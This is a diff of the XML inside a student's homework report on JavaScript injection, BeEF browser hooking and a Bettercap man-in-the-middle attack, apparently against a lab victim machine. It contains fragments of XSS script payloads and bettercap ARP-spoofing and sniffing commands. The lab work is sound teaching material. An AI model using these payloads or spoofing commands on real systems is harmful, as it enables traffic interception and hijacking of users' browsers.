--- a/CMPT489HW6Report.docx
+++ b/CMPT489HW6Report.docx
@@ -41,6 +41,7 @@
             <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
             <w:text/>
           </w:sdtPr>
+          <w:sdtEndPr/>
           <w:sdtContent>
             <w:tc>
               <w:tcPr>
@@ -110,6 +111,7 @@
               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
               <w:text/>
             </w:sdtPr>
+            <w:sdtEndPr/>
             <w:sdtContent>
               <w:p>
                 <w:pPr>
@@ -202,6 +204,7 @@
               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
               <w:text/>
             </w:sdtPr>
+            <w:sdtEndPr/>
             <w:sdtContent>
               <w:p>
                 <w:pPr>
@@ -220,7 +223,25 @@
                     <w:sz w:val="28"/>
                     <w:szCs w:val="28"/>
                   </w:rPr>
-                  <w:t>Marcelo Ollin Paco Zepeda</w:t>
+                  <w:t xml:space="preserve">Marcelo </w:t>
+                </w:r>
+                <w:proofErr w:type="spellStart"/>
+                <w:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                    <w:sz w:val="28"/>
+                    <w:szCs w:val="28"/>
+                  </w:rPr>
+                  <w:t>Ollin</w:t>
+                </w:r>
+                <w:proofErr w:type="spellEnd"/>
+                <w:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                    <w:sz w:val="28"/>
+                    <w:szCs w:val="28"/>
+                  </w:rPr>
+                  <w:t xml:space="preserve"> Paco Zepeda</w:t>
                 </w:r>
               </w:p>
             </w:sdtContent>
@@ -247,6 +268,7 @@
                 <w:calendar w:val="gregorian"/>
               </w:date>
             </w:sdtPr>
+            <w:sdtEndPr/>
             <w:sdtContent>
               <w:p>
                 <w:pPr>
@@ -1806,13 +1828,41 @@
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Part 1: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Javascript Injection &amp; BeEF Introduction</w:t>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Injection &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Introduction</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -1850,7 +1900,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Perform a Javascript injection by changing the URL query parameter (parameter "q") in </w:t>
+        <w:t xml:space="preserve">Perform a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> injection by changing the URL query parameter (parameter "q") in </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2130,33 +2198,87 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>. This time this is a message board. Create an alert() javascript code and inject it in the message board. Report the message you entered confirm that you get an alert.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Message entered into message board:</w:t>
+        <w:t xml:space="preserve">. This time this is a message board. Create an </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> code and inject it in the message board. Report the message you entered confirm that you get an alert.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Message </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>entered into</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> message board:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2212,6 +2334,7 @@
         </w:rPr>
         <w:t>&lt;script&gt;</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2228,7 +2351,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(“</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2845,7 +2978,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Assuming you have already started BeEF, perform the simplest way to hook by navigating in Kali’s browser to </w:t>
+        <w:t xml:space="preserve">Assuming you have already started </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, perform the simplest way to hook by navigating in Kali’s browser to </w:t>
       </w:r>
       <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
@@ -2883,7 +3034,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>. After that confirm that your browser is hooked by checking Online Browsers in BeEF’s left panel. After doing so close the demo page you opened and wait a bit to confirm that now there is no browser in Online Browsers.</w:t>
+        <w:t xml:space="preserve">. After that confirm that your browser is hooked by checking Online Browsers in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>BeEF’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> left panel. After doing so close the demo page you opened and wait a bit to confirm that now there is no browser in Online Browsers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3726,6 +3895,7 @@
         </w:rPr>
         <w:t>&lt;script&gt;</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3753,6 +3923,7 @@
         </w:rPr>
         <w:t>location</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3932,7 +4103,25 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Part 2: Using Bettercap for JavaScript Injection</w:t>
+        <w:t xml:space="preserve">Part 2: Using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for JavaScript Injection</w:t>
       </w:r>
       <w:bookmarkEnd w:id="6"/>
     </w:p>
@@ -3976,7 +4165,43 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Open bettercap and perform a man-in-the middle attack against victim machine. Use also the net sniffer with the verbose flag set to false. Report the commands in bettercap you used to perform the MITM attack.</w:t>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and perform a man-in-the middle attack against victim machine. Use also the net sniffer with the verbose flag set to false. Report the commands in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you used to perform the MITM attack.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4049,32 +4274,74 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:~#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bettercap </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4085,14 +4352,25 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>iface eth0</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>iface</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> eth0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4227,7 +4505,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4247,6 +4535,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4272,7 +4561,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4308,7 +4607,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">targets </w:t>
+        <w:t>targets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4470,7 +4779,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4490,14 +4809,25 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4515,7 +4845,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>spoof on</w:t>
+        <w:t>spoof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4713,7 +5053,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4731,7 +5082,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>spoof enabling forwarding</w:t>
+        <w:t>spoof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enabling forwarding</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4866,7 +5228,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4886,6 +5258,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5055,7 +5428,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5073,7 +5456,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>spoof starting net</w:t>
+        <w:t>spoof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> starting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>net</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5091,7 +5494,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">recon </w:t>
+        <w:t>recon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5127,7 +5540,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5147,6 +5570,7 @@
         </w:rPr>
         <w:t>spoof</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5280,7 +5704,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5300,6 +5734,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5469,7 +5904,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> arp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
